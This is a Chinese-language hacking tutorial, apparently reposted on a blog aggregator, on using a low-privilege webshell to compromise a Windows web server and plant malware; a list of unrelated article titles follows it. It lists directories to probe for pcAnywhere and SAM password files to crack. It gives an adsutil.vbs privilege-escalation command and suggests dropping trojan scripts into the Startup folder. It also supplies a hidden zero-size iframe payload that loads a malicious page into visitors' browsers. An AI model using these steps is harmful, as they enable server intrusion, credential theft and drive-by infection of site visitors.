简单突破权限设置漏洞挂马
来源:互联网 发布:数据分析的相关职业 编辑:程序博客网 时间:2024/05/25 21:34
简单突破权限设置漏洞挂马
今天我要说一下权限设置的问题,有时候我们拿到了一个shell,但权限太低,只能在拿到sehll的站点的目录瞎逛,对于我这样喜欢在服务器站点挂马的人来说太痛苦了。
拿一个例子吧 ,比如asp注入,动网,动感,动易,尘缘等等漏洞,好多的,反正不管怎样我们现在有个shell
当我们取得一个webshell时候,主要要做的就是看看有什末权限,来提升权限,有权限才能知道个个盘都有什末东东,这里的学问很多,
c: d: e:.....
C:/Documents and Settings/All Users/「开始」菜单/程序/
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:/Program Files/serv-u/
C:/WINNT/system32/config/
下它的SAM,破解密码
c:/winnt/system32/inetsrv/data/
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:/prel
C:/Program Files/Java Web Start/
c:/Documents and Settings/
C:/Documents and Settings/All Users/
c:/winnt/system32/inetsrv/data/
c:/Program Files/
c:/Program Files/serv-u/
C:/Program Files/Microsoft SQL Server/
c:/Temp/
c:/mysql/(如果服务器支持PHP)
c:/PHP(如果服务器支持PHP)
运行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
还可以用这段代码试提升,好象不是很理想的
如果主机设置很变态,可以试下在c:/Documents and Settings/All Users/「开始」菜单/程序/启动"写入bat,vbs等木马。
冰狐网页木马比较常用,挂马的代码</html><iframe src="http://*****.htm" name="zhu" width="0" height="0" frameborder="0">
关于防护方面JHACKJ做过一个变态设置教程,大家看看吧,呵呵,给他做广告了,
- 简单突破权限设置漏洞挂马
- 使用webshell突破虚拟主机权限设置的一般思路
- 使用webshell突破虚拟主机权限设置的一般思路
- .NET aspx上传漏洞突破
- 勇往直前程序员突破一切漏洞
- Guest权限突破
- 突破访问权限
- 人人 突破 权限 相册 查看
- 关于WEB服务器系统盘权限简单设置
- WEB服务器系统盘权限简单设置
- WEB服务器系统盘权限简单设置
- android 设置app root权限简单方法
- iGuard简单突破
- 权限控制中的漏洞
- IIS写权限漏洞
- 突破简单的QQ限制
- DISCUZ漏洞与提升权限
- 致命SAP权限控制漏洞
- [C++] 一个真实的 C++ Builder 系统编码规范文档
- 菜鸟求救!!!关于用popupmenu弹出新窗体的问题
- DataGrid实现增删(带提示)改和分页
- 如何实现无刷新的DropdownList联动效果
- 文件上传的各种实现方法比较
- 简单突破权限设置漏洞挂马
- java中按字节截取String字符串.
- 从MVC讲到多层架构
- 如何建立DHCP服务器
- Win 2003中提高FSO的安全性
- VS.NET 2003简体中文版下载
- 如何使您的WEB服务器支持WAP数据发送?
- ASP学习:远程注册自己的组件
- 各种系统中密码文件的位置